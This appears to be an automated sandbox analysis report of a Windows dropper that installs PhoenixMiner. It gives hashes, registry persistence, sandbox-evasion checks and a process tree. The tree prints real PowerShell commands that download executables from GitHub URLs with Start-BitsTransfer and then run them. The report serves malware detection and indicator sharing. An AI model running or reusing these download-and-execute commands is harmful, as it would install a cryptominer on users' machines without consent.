Analysis
-
max time kernel
135s -
max time network
111s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
08-01-2021 18:39
Static task
static1
Behavioral task
behavioral1
Sample
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
Resource
win10v20201028
General
-
Target
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
-
Size
8.3MB
-
MD5
9ed9ad87a1564fbb5e1b652b3e7148c8
-
SHA1
0c001b7e9615cbc22eac2a324d8deb7eaf069ff7
-
SHA256
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89
-
SHA512
e49e403a73ff1d10111d23cc70ae95ffae63abbc4a52cfc52c447ee9f15e76ab44f07d0f41e3b3e63a73a07e7748b8ac7ed8c997f1051a10ca5fad1dace4183a
Malware Config
Extracted
https://raw.githubusercontent.com/jkh36/d/main/bild.exe
https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
PhoenixMiner.exepid process 3340 PhoenixMiner.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
PhoenixMiner.exedescription ioc process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce PhoenixMiner.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" PhoenixMiner.exe -
JavaScript code in executable 1 IoCs
Processes:
yara_rule js -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName taskmgr.exe -
Suspicious behavior: EnumeratesProcesses 36 IoCs
Processes:
powershell.exepowershell.exetaskmgr.exepid process 4376 powershell.exe 4376 powershell.exe 4376 powershell.exe 888 powershell.exe 888 powershell.exe 888 powershell.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exetaskmgr.exedescription pid process Token: SeDebugPrivilege 4376 powershell.exe Token: SeDebugPrivilege 888 powershell.exe Token: SeDebugPrivilege 3548 taskmgr.exe Token: SeSystemProfilePrivilege 3548 taskmgr.exe Token: SeCreateGlobalPrivilege 3548 taskmgr.exe Token: 33 3548 taskmgr.exe Token: SeIncBasePriorityPrivilege 3548 taskmgr.exe -
Suspicious use of FindShellTrayWindow 56 IoCs
Processes:
taskmgr.exepid process 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe -
Suspicious use of SendNotifyMessage 56 IoCs
Processes:
taskmgr.exepid process 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe 3548 taskmgr.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exePhoenixMiner.exedescription pid process target process PID 4756 wrote to memory of 3340 4756 3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe PhoenixMiner.exe PID 4756 wrote to memory of 3340 4756 3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe PhoenixMiner.exe PID 4756 wrote to memory of 3340 4756 3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe PhoenixMiner.exe PID 3340 wrote to memory of 4376 3340 PhoenixMiner.exe powershell.exe PID 3340 wrote to memory of 4376 3340 PhoenixMiner.exe powershell.exe PID 3340 wrote to memory of 4376 3340 PhoenixMiner.exe powershell.exe PID 3340 wrote to memory of 888 3340 PhoenixMiner.exe powershell.exe PID 3340 wrote to memory of 888 3340 PhoenixMiner.exe powershell.exe PID 3340 wrote to memory of 888 3340 PhoenixMiner.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe"C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3340 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/jkh36/d/main/bild.exe,https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe -Destination lWr.exe,ck.exe;3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4376 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Start-Process lWr.exe; Start-Process ck.exe;3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:888
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3548
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
6ed4b3d25a6f22e8dcef5167080ceb75
SHA1b953ecc8de151b85f0b64784235a924b609582ca
SHA256d4e932b7151d03a034cc4c0567082d2390fc791dc95b2a4d9a0623acbf4d2384
SHA51280ef5c4be3611238fb1f15561fd1ae8101482e8b94897be141a0d9728851bc6edf3c497a619acef7ff481a5e45b24df5584b32979d9006cc2c1e61fd2aed9d9b
-
MD5
16fdee964ab850fc1f650efa173b3e63
SHA1451ab25448925a4c4e97424fa296d52684ad728f
SHA256dea601f37ab9ce5de00358fc1afee4b7ea791c592ebe2d7a609b1a2e37e9485f
SHA512a538243c945cbf5f0cb9cbf9c16d5687841da310cd2212834bc709b6213f36476ff9b51ff2d7b68c2f5e9835ba95f8da99c0d3dd3ba1e416acac295f3a1ea718
-
MD5
c74ab76362f2321b7143e8ba2517c16b
SHA16b4c65e2b1ba59d155c5d453285fae4d3e52b2a6
SHA256938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f
SHA5122a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17
-
MD5
c74ab76362f2321b7143e8ba2517c16b
SHA16b4c65e2b1ba59d155c5d453285fae4d3e52b2a6
SHA256938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f
SHA5122a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17